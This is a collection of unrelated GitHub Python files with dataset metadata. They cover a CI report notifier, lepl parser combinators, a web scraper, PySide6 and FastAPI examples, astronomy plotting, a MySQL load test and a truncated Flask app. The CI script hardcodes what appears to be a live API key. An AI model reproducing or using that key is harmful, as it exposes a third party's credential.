f'https://messenger_team.gitlab.io/-/{repo_name}/-/jobs/{CI_JOB_ID}/artifacts/report/report.html'\n msg = f'`GUI web tests` CI_JOB_ID={CI_JOB_ID} - *{status}* \\n Перейти к джобе: {job} \\n Смотреть отчет: {report}'\n key = 'JEkKqCP1IQLzkAn'\n\n requests.post('https://hostname/api/message', data={\n 'key': key,\n 'message': f'{msg}',\n 'important': 'false',\n 'nopreview': 'true'\n\n })\n\nif __name__ == \"__main__\":\n send_report_link()", "repo_name": "arkuz/messenger_tests_web", "sub_path": "scripts/send_tests_report.py", "file_name": "send_tests_report.py", "file_ext": "py", "file_size_in_byte": 892, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 3, "usage_type": "call"}, {"api_name": "os.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "2558535844", "text": "\nfrom abc import ABCMeta\nfrom collections import deque\n\nfrom lepl.matchers.core import Literal\nfrom lepl.matchers.matcher import add_children\nfrom lepl.matchers.support import coerce_, sequence_matcher_factory, \\\n trampoline_matcher_factory, to\nfrom lepl.matchers.transform import Transformable\nfrom lepl.support.lib import lmap, format, document\n\n\n# pylint: disable-msg=C0103, W0105\n# Python 2.6\n#class BaseSearch(metaclass=ABCMeta):\n_BaseSearch = ABCMeta('_BaseSearch', (object, ), {})\n'''\nABC used to identify matchers. \n\nNote that graph traversal assumes subclasses are hashable and iterable.\n'''\n\nclass BaseSearch(_BaseSearch):\n pass\n\n\ndef _cleanup(queue):\n '''\n Utility to discard queued/stacked values.\n '''\n for (_count, _acc, _stream, generator) in queue:\n generator.generator.close()\n \n\ndef search_factory(factory):\n '''\n Add the arg processing common to all searching.\n '''\n def new_factory(first, start, stop, rest=None):\n rest = first if rest is None else rest\n return factory(first, start, stop, rest)\n return document(new_factory, factory)\n\n\n@trampoline_matcher_factory(False)\n@search_factory\ndef DepthFirst(first, start, stop, rest):\n '''\n (Post order) Depth first repetition (typically used via `Repeat`).\n '''\n def match(support, stream):\n stack = deque()\n try:\n stack.append((0, [], stream, first._match(stream)))\n while stack:\n (count1, acc1, stream1, generator) = stack[-1]\n extended = False\n if stop is None or count1 < stop:\n count2 = count1 + 1\n try:\n (value, stream2) = yield generator\n acc2 = acc1 + value\n stack.append((count2, acc2, stream2, \n rest._match(stream2)))\n extended = True\n except StopIteration:\n pass\n if not extended:\n if count1 >= start and (stop is None or count1 <= stop):\n yield (acc1, stream1)\n stack.pop()\n finally:\n _cleanup(stack)\n \n return match\n\n\n@trampoline_matcher_factory(False)\n@search_factory\ndef BreadthFirst(first, start, stop, rest):\n '''\n (Level order) Breadth first repetition (typically used via `Repeat`).\n '''\n def match(support, stream):\n queue = deque()\n try:\n queue.append((0, [], stream, first._match(stream)))\n while queue:\n (count1, acc1, stream1, generator) = queue.popleft()\n if count1 >= start and (stop is None or count1 <= stop):\n yield (acc1, stream1)\n count2 = count1 + 1\n try:\n while True:\n (value, stream2) = yield generator\n acc2 = acc1 + value\n if stop is None or count2 <= stop:\n queue.append((count2, acc2, stream2, \n rest._match(stream2)))\n except StopIteration:\n pass\n finally:\n _cleanup(queue)\n \n return match\n\n\n@trampoline_matcher_factory(False, matcher=to(Literal))\ndef OrderByResultCount(matcher, ascending=True):\n '''\n Modify a matcher to return results in length order.\n '''\n\n def match(support, stream):\n '''\n Attempt to match the stream.\n '''\n generator = matcher._match(stream)\n results = []\n try:\n while True:\n # syntax error if this on one line?!\n result = yield generator\n results.append(result)\n except StopIteration:\n pass\n for result in sorted(results,\n key=lambda x: len(x[0]), reverse=ascending):\n yield result\n \n return match\n \n\n@sequence_matcher_factory()\n@search_factory\ndef DepthNoTrampoline(first, start, stop, rest):\n '''\n A more efficient search when all matchers are functions (so no need to\n trampoline). Depth first (greedy).\n '''\n def matcher(support, stream):\n stack = deque()\n try:\n stack.append((0, [], stream, first._untagged_match(stream)))\n while stack:\n (count1, acc1, stream1, generator) = stack[-1]\n extended = False\n if stop is None or count1 < stop:\n count2 = count1 + 1\n try:\n (value, stream2) = next(generator)\n acc2 = acc1 + value\n stack.append((count2, acc2, stream2, \n rest._untagged_match(stream2)))\n extended = True\n except StopIteration:\n pass\n if not extended:\n if count1 >= start and (stop is None or count1 <= stop):\n yield (acc1, stream1)\n stack.pop()\n finally:\n for (_count, _acc, _stream, generator) in stack:\n generator.close()\n \n return matcher\n \n \n@sequence_matcher_factory()\n@search_factory\ndef BreadthNoTrampoline(first, start, stop, rest):\n '''\n A more efficient search when all matchers are functions (so no need to\n trampoline). Breadth first (non-greedy).\n '''\n def matcher(support, stream):\n queue = deque()\n try:\n queue.append((0, [], stream, first._untagged_match(stream)))\n while queue:\n (count1, acc1, stream1, generator) = queue.popleft()\n if count1 >= start and (stop is None or count1 <= stop):\n yield (acc1, stream1)\n count2 = count1 + 1\n for (value, stream2) in generator:\n acc2 = acc1 + value\n if stop is None or count2 <= stop:\n queue.append((count2, acc2, stream2, \n rest._untagged_match(stream2)))\n finally:\n for (_count, _acc, _stream, generator) in queue:\n generator.close()\n \n return matcher\n\n\nadd_children(BaseSearch, DepthFirst, BreadthFirst, \\\n DepthNoTrampoline, BreadthNoTrampoline)\n\n \nclass _BaseCombiner(Transformable):\n '''\n Support for `And` and `Or`.\n '''\n \n def __init__(self, *matchers):\n super(_BaseCombiner, self).__init__()\n self._args(matchers=lmap(coerce_, matchers))\n \n def compose(self, wrapper):\n '''\n Generate a new instance with the composed function from the Transform.\n '''\n copy = type(self)(*self.matchers)\n copy.wrapper = self.wrapper.compose(wrapper)\n return copy\n \n\n@trampoline_matcher_factory(True, args_=to(Literal))\ndef And(*matchers):\n '''\n Match one or more matchers in sequence (**&**).\n It can be used indirectly by placing ``&`` between matchers.\n '''\n# matchers = lmap(coerce_, matchers)\n \n def match(support, stream_in):\n if matchers:\n stack = deque([([], \n matchers[0]._match(stream_in), \n matchers[1:])])\n append = stack.append\n pop = stack.pop\n try:\n while stack:\n (result, generator, queued) = pop()\n try:\n (value, stream_out) = yield generator\n append((result, generator, queued))\n if queued:\n append((result+value, \n queued[0]._match(stream_out), \n queued[1:]))\n else:\n yield (result+value, stream_out)\n except StopIteration:\n pass\n finally:\n for (result, generator, queued) in stack:\n generator.generator.close()\n \n return match\n\n\n@sequence_matcher_factory(args_=to(Literal))\ndef AndNoTrampoline(*matchers):\n '''\n Used as an optimisation when sub-matchers do not require the trampoline.\n '''\n def matcher(support, stream_in):\n if matchers:\n stack = deque([([], matchers[0]._untagged_match(stream_in), matchers[1:])])\n append = stack.append\n pop = stack.pop\n try:\n while stack:\n (result, generator, queued) = pop()\n try:\n (value, stream_out) = next(generator)\n append((result, generator, queued))\n if queued:\n append((result+value, \n queued[0]._untagged_match(stream_out), \n queued[1:]))\n else:\n yield (result+value, stream_out)\n except StopIteration:\n pass\n finally:\n for (result, generator, queued) in stack:\n generator.close()\n \n return matcher\n \n \n@trampoline_matcher_factory(True, args_=to(Literal))\ndef Or(*matchers):\n '''\n Match one of the given matchers (**|**).\n It can be used indirectly by placing ``|`` between matchers.\n \n Matchers are tried from left to right until one succeeds; backtracking\n will try more from the same matcher and, once that is exhausted,\n continue to the right. String arguments will be coerced to \n literal matches.\n '''\n# matchers = lmap(coerce_, matchers)\n \n def match(support, stream_in):\n '''\n Do the matching (return a generator that provides successive \n (result, stream) tuples). The result will correspond to one of the\n sub-matchers (starting from the left).\n '''\n for matcher in matchers:\n generator = matcher._match(stream_in)\n try:\n while True:\n yield (yield generator)\n except StopIteration:\n pass\n \n return match\n\n\n@sequence_matcher_factory(args_=to(Literal))\ndef OrNoTrampoline(*matchers):\n '''\n Used as an optimisation when sub-matchers do not require the trampoline.\n '''\n def match(support, stream_in):\n '''\n Do the matching (return a generator that provides successive \n (result, stream) tuples). The result will correspond to one of the\n sub-matchers (starting from the left).\n '''\n for matcher in matchers:\n for result in matcher._untagged_match(stream_in):\n yield result\n return match\n\n \n@trampoline_matcher_factory(True)\ndef First(*matchers):\n '''\n Match the first successful matcher only (**%**).\n It can be used indirectly by placing ``%`` between matchers.\n Note that backtracking for the first-selected matcher will still occur.\n\n Matchers are tried from left to right until one succeeds; backtracking\n will try more from the same matcher (only). String arguments will be \n coerced to literal matches.\n '''\n def match(self, stream):\n matched = False\n for matcher in self.matchers:\n generator = matcher._match(stream)\n try:\n while True:\n yield (yield generator)\n matched = True\n except StopIteration:\n pass\n if matched:\n break\n\n return match\n\n\n", "repo_name": "willtang/lyx2ebook", "sub_path": "src/lepl/matchers/combine.py", "file_name": "combine.py", "file_ext": "py", "file_size_in_byte": 11869, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "abc.ABCMeta", "line_number": 16, "usage_type": "call"}, {"api_name": "lepl.support.lib.document", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 52, "usage_type": "call"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 45, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 85, "usage_type": "call"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 78, "usage_type": "call"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 108, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 108, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 108, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 142, "usage_type": "call"}, {"api_name": "lepl.matchers.support.sequence_matcher_factory", "line_number": 134, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 177, "usage_type": "call"}, {"api_name": "lepl.matchers.support.sequence_matcher_factory", "line_number": 169, "usage_type": "call"}, {"api_name": "lepl.matchers.matcher.add_children", "line_number": 197, "usage_type": "call"}, {"api_name": "lepl.matchers.transform.Transformable", "line_number": 201, "usage_type": "name"}, {"api_name": "lepl.support.lib.lmap", "line_number": 208, "usage_type": "call"}, {"api_name": "lepl.matchers.support.coerce_", "line_number": 208, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 229, "usage_type": "call"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 219, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 219, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 219, "usage_type": "argument"}, {"api_name": "collections.deque", "line_number": 262, "usage_type": "call"}, {"api_name": "lepl.matchers.support.sequence_matcher_factory", "line_number": 255, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 255, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 255, "usage_type": "argument"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 286, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 286, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 286, "usage_type": "argument"}, {"api_name": "lepl.matchers.support.sequence_matcher_factory", "line_number": 316, "usage_type": "call"}, {"api_name": "lepl.matchers.support.to", "line_number": 316, "usage_type": "call"}, {"api_name": "lepl.matchers.core.Literal", "line_number": 316, "usage_type": "argument"}, {"api_name": "lepl.matchers.support.trampoline_matcher_factory", "line_number": 333, "usage_type": "call"}]} +{"seq_id": "33696749273", "text": "# A web crawler project to gather information from https://soundcloud.com/\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef music_spider(band_list):\n try:\n print('Fetching data from Soundcloud...\\n')\n for band in band_list:\n url = 'https://soundcloud.com/search?q=' + band\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, \"lxml\")\n for link in soup.find_all(\"ul\"):\n for item in link.find_all(\"h2\"):\n # print(item.next_element.next_element)\n print(item.string)\n except Exception as e:\n print(\"Oops! Connection not established: \", e)\n\n\nmusic_spider(['iron maiden', 'metallica', 'megadeth', 'kreator'])\n", "repo_name": "abhijitroynits/python_practice_101", "sub_path": "Tutorials7-56/25_webCrawler.py", "file_name": "25_webCrawler.py", "file_ext": "py", "file_size_in_byte": 787, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.get", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "23255557308", "text": "\"\"\"from PySide6.QtWidgets import QApplication,QPushButton,QWidget,QVBoxLayout,QMainWindow\n\napp = QApplication()\n\nbotao = QPushButton(\"texto botao\") # faz botao\nbotao.setStyleSheet('font-size: 80px') # faz o estilizacao do botao\nbotao.show()# exibi a janela\n\ncentral_widget = QWidget() # central para adicionar no layout\nlayout = QVBoxLayout()\nlayout.addWidget(botao)\n\n\nwindow = QMainWindow()\nwindow.setWindowTitle('primeiro projeto') # altera o nome da janela\n\ndef slot_example(status_bar):\n status_bar.showMessage('o meu sloat foi executado')\n\n# barra no fundo da aplicacao\nstatus_bar = window.statusBar() # faz a barra no fundo da aplicacao\nstatus_bar.showMessage('mostra mensagem na barra') # exbi mensagem na barra da aplicacao\n\n# menuBar\nmenu = window.menuBar() # cria uma menu na parte susperior\nprimeiro_menu = menu.addMenu('primeiro menu') # vai adicionar um meno na tela na parte superior\nprimeira_acao = primeiro_menu.addAction('primeira acao') # adicionando uma acao ao menu e printando\n# sempre tem que passar algum parametro\nprimeira_acao.triggered.connect(lambda: slot_example(status_bar)) # aqui faz uma lamba para adicar a excucao e retorna uma boolean\n\n\ncentral_widget.show() # aparecer na tela\napp.exec() # o loop da aplicacao\n\"\"\"\n# O básico sobre Signal e Slots (eventos e documentação)\nimport sys\nfrom typing import Optional\n\nfrom PySide6.QtCore import Slot\nfrom PySide6.QtWidgets import (QApplication, QGridLayout, QMainWindow,\n QPushButton, QWidget)\n\nclass MyWindow(QMainWindow):\n def __init__(self,parent = None):\n super().__init__(parent)\n self.central_widget = QWidget()\n self.setCentralWidget(self.central_widget)\n self.setWindowTitle('Minha janela bonita')\n\n self.botao1 = QPushButton('Texto do botão') # cria botoes\n self.botao1.setStyleSheet('font-size: 80px;') # modifica o tamanho da fonte\n self.botao1.clicked.connect(self.outro_slot) # type:ignore\n\n self.botao2 = QPushButton('Botão 2') # cria botoes\n self.botao2.setStyleSheet('font-size: 40px;') # modifica o tamanho da fonte\n\n self.botao3 = QPushButton('Botão 3') # cria botoes\n self.botao3.setStyleSheet('font-size: 40px;') # modifica o tamonha da fonte\n\n self.grid_layout = QGridLayout() # cfia um grid como layout\n self.central_widget.setLayout(self.grid_layout)\n\n self.grid_layout.addWidget(self.botao1, 1, 1, 1, 1)\n self.grid_layout.addWidget(self.botao2, 1, 2, 1, 1)\n self.grid_layout.addWidget(self.botao3, 3, 1, 1, 2)\n\n # statusBar\n self.status_bar = self.statusBar()\n self.status_bar.showMessage('Mostrar mensagem na barra')\n\n # menuBar\n self.menu = self.menuBar()\n self.primeiro_menu = self.menu.addMenu('Primeiro menu')\n self.primeira_acao = self.primeiro_menu.addAction('Primeira ação')\n self.primeira_acao.triggered.connect(self.slot_example) # type:ignore\n\n self.segunda_action = self.primeiro_menu.addAction('Segunda ação')\n self.segunda_action.setCheckable(True)\n self.segunda_action.toggled.connect(self.outro_slot) # type:ignore\n self.segunda_action.hovered.connect(self.outro_slot) # type:ignore\n\n @Slot()\n def slot_example(self,status_bar):\n def inner():\n status_bar.showMessage('O meu slot foi executado')\n return inner\n\n\n @Slot()\n def outro_slot(self):\n print('Está marcado?', self.segunda_action.isChecked())\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n window = MyWindow()\n window.show()\n app.exec() # O loop da aplicação\n\n", "repo_name": "otavio-schmieleski/Python", "sub_path": "Interface_Grafica/comando.py", "file_name": "comando.py", "file_ext": "py", "file_size_in_byte": 3653, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 43, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 46, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 50, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 54, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 57, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 60, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Slot", "line_number": 82, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Slot", "line_number": 89, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 94, "usage_type": "attribute"}]} +{"seq_id": "18743921589", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport healpy as hp\nimport huffman\nimport h5py\n\n\nfrom glob import glob\n\nversion = 24\nband = \"K1\"\n\nfnames = glob(f\"/mn/stornext/d16/cmbco/bp/wmap/data/wmap_{band}_*v{version}.h5\")\nfnames.sort()\nfname = fnames[0]\nfname = \"/mn/stornext/d16/cmbco/bp/wmap/data/wmap_K1_001588_v24.h5\"\n\nlabels = [f\"{band}13\", f\"{band}14\", f\"{band}23\", f\"{band}24\"]\nf = h5py.File(fname, \"r\")\nobsid = str(list(f.keys())[0])\nobsid = \"038101\"\nhuffTree = f[obsid + \"/common/hufftree\"]\nhuffSymb = f[obsid + \"/common/huffsymb\"]\nh = huffman.Huffman(tree=huffTree, symb=huffSymb)\n\n\nDAs = [[], [], [], []]\nflags = [[], [], [], []]\nsigmas = []\ngains = np.zeros(len(labels))\nnpsi = 2048\npsiBins = np.linspace(0, 2 * np.pi, npsi)\nfor num, label in enumerate(labels):\n TODs = np.array(f[obsid + \"/\" + label + \"/tod\"])\n scalars = f[obsid + \"/\" + label + \"/scalars\"]\n gains[num] = scalars[0]\n flag = h.Decoder(np.array(f[obsid + \"/\" + label + \"/flag\"]))\n flags[num] = flags[num] + flag.tolist()\n DAs[num] = DAs[num] + TODs.tolist()\n sigmas.append(TODs.std())\n if label == f\"{band}13\":\n pixA = h.Decoder(np.array(f[obsid + \"/\" + label + \"/pixA\"])).astype(\"int\")\n pixB = h.Decoder(np.array(f[obsid + \"/\" + label + \"/pixB\"])).astype(\"int\")\n\n\nnside = 512\nthetaA, phiA = hp.pix2ang(nside, pixA)\nthetaB, phiB = hp.pix2ang(nside, pixB)\n# loop over:\nfor i in range(7):\n hp.mollview(hp.UNSEEN * np.ones(12), cbar=False, title=\"\", sub=(3, 3, i + 1))\n ax = plt.gca()\n ax.projscatter(\n thetaA[4000 * i : 4000 * (i + 1)],\n phiA[4000 * i : 4000 * (i + 1)],\n color=\"r\",\n s=0.1,\n )\n ax.projscatter(\n thetaB[4000 * i : 4000 * (i + 1)],\n phiB[4000 * i : 4000 * (i + 1)],\n color=\"b\",\n s=0.1,\n )\n plt.title(f\"{4000*i}--{4000*(i+1)}\")\nhp.mollview(hp.UNSEEN * np.ones(12), cbar=False, title=\"\")\nhp.projscatter(thetaA[:4000], phiA[:4000], color=\"r\", s=0.5)\nhp.projscatter(thetaB[:4000], phiB[:4000], color=\"b\", s=0.5)\n\nhp.mollview(hp.UNSEEN * np.ones(12), cbar=False, title=\"\")\nhp.projscatter(thetaA[4000:8000], phiA[4000:8000], color=\"r\", s=0.5)\nhp.projscatter(thetaB[4000:8000], phiB[4000:8000], color=\"b\", s=0.5)\nhp.mollview(hp.UNSEEN * np.ones(12), cbar=False, title=\"\")\nhp.projscatter(thetaA[9000:13000], phiA[9000:13000], color=\"r\", s=0.5)\nhp.projscatter(thetaB[9000:13000], phiB[9000:13000], color=\"b\", s=0.5)\nplt.title(\"Scans 9000--13000\")\nplt.show()\n", "repo_name": "Cosmoglobe/Commander", "sub_path": "commander3/todscripts/wmap/plot_scans.py", "file_name": "plot_scans.py", "file_ext": "py", "file_size_in_byte": 2463, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "61", "api": [{"api_name": "glob.glob", "line_number": 13, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 19, "usage_type": "call"}, {"api_name": "huffman.Huffman", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "healpy.pix2ang", "line_number": 47, "usage_type": "call"}, {"api_name": "healpy.pix2ang", "line_number": 48, "usage_type": "call"}, {"api_name": "healpy.mollview", "line_number": 51, "usage_type": "call"}, {"api_name": "healpy.UNSEEN", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "healpy.mollview", "line_number": 66, "usage_type": "call"}, {"api_name": "healpy.UNSEEN", "line_number": 66, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 66, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 67, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 68, "usage_type": "call"}, {"api_name": "healpy.mollview", "line_number": 70, "usage_type": "call"}, {"api_name": "healpy.UNSEEN", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 70, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 71, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 72, "usage_type": "call"}, {"api_name": "healpy.mollview", "line_number": 73, "usage_type": "call"}, {"api_name": "healpy.UNSEEN", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.ones", "line_number": 73, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 74, "usage_type": "call"}, {"api_name": "healpy.projscatter", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}]} +{"seq_id": "365814631", "text": "import mysql.connector\nimport time\nimport random\nfrom PIL import Image\nimport numpy as np\n\ndef img2arr(img_path):\n img = Image.open(img_path)\n return np.array(img.convert('L'))\n\nif __name__ == '__main__':\n arr = img2arr('lisa_small.png')\n\n mydb = mysql.connector.connect(\n host='127.0.0.1', \n port=4000, \n user='root')\n mycursor = mydb.cursor()\n mycursor.execute('CREATE DATABASE IF NOT EXISTS yifan_db')\n mydb.commit()\n mycursor.execute('use yifan_db')\n mydb.commit()\n\n num_tables = arr.shape[0]\n num_epochs = arr.shape[1]\n num_records = 100\n max_value = 255.0\n name_prefix = 'may force be with you!!'\n\n print('create tables...')\n for tid in range(num_tables):\n mycursor.execute('CREATE TABLE mytable{} (id INT PRIMARY KEY, name VARCHAR(255))'.format(tid))\n mydb.commit()\n\n print('write to tables...')\n for tid in range(num_tables):\n print('table {}'.format(tid))\n sql = 'INSERT INTO mytable{} (id, name) VALUES (%s, %s)'.format(tid)\n t1 = time.time()\n for rid in range(num_records):\n val = (str(rid), name_prefix + ' rid = {} time = {}'.format(rid, t1))\n mycursor.execute(sql, val)\n mydb.commit()\n t2 = time.time()\n print('insert {} records to mytable{} costs {} s'.format(num_records, tid, t2 - t1))\n\n\n for eid in range(num_epochs):\n t1 = time.time()\n for tid in range(num_tables):\n # num_updates = random.randint(0, num_records - 1)\n num_updates = np.clip(int(arr[num_tables - tid - 1][eid] / max_value * 100.0), 0, 100)\n print('epoch[{}] mytable{} update {} records'.format(eid, tid, num_updates))\n sql = 'UPDATE mytable{} SET name = %s WHERE id = %s'.format(tid)\n for rid in range(num_updates):\n val = (name_prefix + ' rid = {} time = {}'.format(rid, t1), str(rid))\n mycursor.execute(sql, val)\n mydb.commit()\n t2 = time.time()\n print('epoch[{}] takes {} s'.format(eid, t2 - t1))\n sleep_time = 60 - (time.time() - t1)\n if sleep_time > 0:\n time.sleep(sleep_time)\n", "repo_name": "xuyifangreeneyes/hw", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 2187, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 14, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 14, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 14, "usage_type": "name"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "17178909242", "text": "from fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI\napp = FastAPI()\n@app.get(\"/hello/\")\nasync def hello():\n ret='''\n\n\nHello World!\n\n\n'''\n return HTMLResponse(content=ret)", "repo_name": "waiyankyawsdk/frontiir_learn", "sub_path": "LearnTutopointFirst/4-html-response.py", "file_name": "4-html-response.py", "file_ext": "py", "file_size_in_byte": 228, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.FastAPI", "line_number": 3, "usage_type": "call"}, {"api_name": "fastapi.responses.HTMLResponse", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "16289347705", "text": "from collections import defaultdict\n\n\ndef groupAnagrams(strs):\n anagram_map = defaultdict(list)\n for s in strs:\n sorted_s = ''.join(sorted(s))\n anagram_map[sorted_s].append(s)\n return list(anagram_map.values())\n\n\nif __name__ == '__main__':\n assert(groupAnagrams([\"eat\",\"tea\",\"tan\",\"ate\",\"nat\",\"bat\"])) == [[\"eat\",\"tea\",\"ate\"],[\"tan\",\"nat\"],[\"bat\"]]", "repo_name": "willyg42/LeetCode", "sub_path": "AmazonTopQuestions/ArraysAndStrings/groupAnagrams.py", "file_name": "groupAnagrams.py", "file_ext": "py", "file_size_in_byte": 376, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.defaultdict", "line_number": 5, "usage_type": "call"}]} +{"seq_id": "30529018653", "text": "# -*- coding: utf-8 -*-\r\n\r\nimport argon2, json, math, os, sys, time\r\n\r\nfrom sqlalchemy.orm import joinedload\r\n\r\nfrom flask import flash, redirect, render_template, request\r\n\r\nfrom .auth import *\r\nfrom ..database import (\r\n Match,\r\n MatchFrame,\r\n TankFrame,\r\n MatchTanks,\r\n FrameUpdates,\r\n Users,\r\n db,\r\n)\r\nfrom ..game_server import entry\r\n\r\n\r\ndef url_for_safe(*args, **kwargs):\r\n try:\r\n return url_for(*args, **kwargs)\r\n except:\r\n return \"\"\r\n\r\n\r\ndef render(*args, **kwargs):\r\n return render_template(\r\n *args, **kwargs, user=user, url_for_safe=url_for_safe\r\n )\r\n\r\n\r\n@app.route(\"/\")\r\ndef serve_root():\r\n return render(\"index.html\"), 200\r\n\r\n\r\n@app.route(\"/submit\", methods=[\"GET\"])\r\ndef serve_submit_page():\r\n if not user:\r\n return redirect(\"/\"), 303\r\n else:\r\n return render(\"submit.html\", code=user.code or \"\"), 200\r\n\r\n\r\n@app.route(\"/submit\", methods=[\"POST\"])\r\ndef accept_submission():\r\n if not user:\r\n flash(\"You are not logged in.\", category=\"ERROR\")\r\n return redirect(\"/\"), 303\r\n\r\n if request.form.get(\"switch\") == \"on\":\r\n file = request.files[\"file\"]\r\n code = file.read()\r\n else:\r\n code = request.form[\"code\"]\r\n user.code = code\r\n db.session.commit()\r\n flash(\"Code submitted!\", category=\"SUCCESS\")\r\n return render(\"submit.html\", code=user.code or \"\"), 200\r\n\r\n\r\n@app.route(\"/signin\", methods=[\"GET\"])\r\ndef serve_signin_page():\r\n return render(\"signin.html\"), 200\r\n\r\n\r\n@app.route(\"/signin\", methods=[\"POST\"])\r\ndef handle_signin_request():\r\n username = request.form[\"username\"]\r\n password = request.form[\"password\"]\r\n\r\n u = Users.query.filter_by(username=username).first()\r\n if u is None:\r\n flash(\"Username and password don't match.\", category=\"ERROR\")\r\n return render(\"signin.html\"), 200\r\n elif argon2.argon2_hash(password, username + \"abcdefgh\") != 